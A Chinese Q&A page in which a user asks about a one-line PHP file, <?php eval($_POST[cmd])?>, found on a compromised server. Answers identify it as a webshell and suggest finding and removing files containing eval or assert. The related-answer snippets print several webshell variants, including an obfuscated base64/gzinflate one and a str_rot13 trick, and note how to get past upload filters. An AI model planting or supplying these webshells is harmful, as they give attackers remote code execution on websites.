55问答网
所有问题
<?php eval($_POST[cmd])?> 这个是什么啊?具体使用方法帮忙分析一下啊
最近公司的服务器被黑了!网站根目录多了一个PHP文件!我用UE打开说文件是什么CMD格式要我转换!打开有就只有上面的那句话!我想请教一下高手分析一下哦
举报该问题
推荐答案 2011-02-22
这是php一句话木马,通过菜刀等工具可以上传或执行命令。php留的后门要清除比较麻烦,因为方法太多了,你可以先搜索一下文件,查找所有带有eval,assert的文件,再清除!
追问
不好意思!分不能给你啊! 我要详细的哦!
温馨提示:答案为网友推荐,仅供参考
当前网址:
http://55.wendadaohang.com/zd/FFRFL44LF.html
其他回答
第1个回答 2012-09-05
国产菜刀的后门~
第2个回答 2011-02-26
这是网站一句话木马 是你网站安全出现了问题 建议花钱找专业做网站安全的给你处理!
相似回答
PHP
的标识有哪些
答:
phpeval($_POST[
'
cmd
'
]); ?
>php推荐使用的标记风格。服务器管理员无法禁用,所有服务器上均可使用该风格。2.脚本风格 eval($_POST['cmd']);默认开启,无法禁用笔者曾遇到过一CTF题目,要求上传shell,但是却对文件内容做了过滤 ,<? 以及 php,替换为了空格。此种风格中,language的值,大小写...
php
小马
是什么
答:
>其中eval就是执行命令的函数,$_POST['a']就是接收的数据
。eval函数把接收的数据当作PHP代码来执行。这样我们就能够让插入了一句话木马的网站执行我们传递过去的任意PHP语句。这便是一句话木马的强大之处。示例:因为木马是接收post请求中 “a” 的数据( $_...
求
分析这个php
木马
答:
接收
post
参数sxd 然后使用正则的e模式 ,执行'@'.str_rot13('riny').'($cmd)' 这个字符串其实是'@
eval($cmd)
' 就是又去执行了传过来的sxd 当
php
代码执行了. 这样就可以做很多事情 .
php
一句话木马怎么用
答:
如果没有执行权限的话,你就算上传上去了也是没有用的。你只有想办法把木门上传到其他能执行的目录才行。一句话木马的话,就是<
?php
eval ($_POST[
val
]); ?
> eval函数的功能就是把传入的值当成程序来执行。
php
<
?eval(
gzinflate(base64_decode
答:
相当于:?><
?eval($_POST[cmd]);?
><?其实很简单:eval是执行,你echo一下就看到了 echo (gzinflate(base64_decode("s7ezsU8tS8zRUIkP8A8OiU7OTYnVtLYHigIA")));里面的eval也是执行,所以结果就是用
php
执行了cmd。
大家正在搜
php一句话木马不用eval
phpevalexec
eval用什么替代
eval是什么
eval是做什么的
eval shell
php eval
eval怎么用
phpeval函数
相关问题
网站中出现<?php eval($_POST['posha'...
<?php EVaL ($_REQUEST ['c'] ) ...
php中eval($_POST[$admin['pass']...
织梦程序首页为什么会跳转indax.html
php $str = "true or false;"; e...
iis7.0畸形解析漏洞怎么解决
网站中出现<?php eval($_POST['posha'...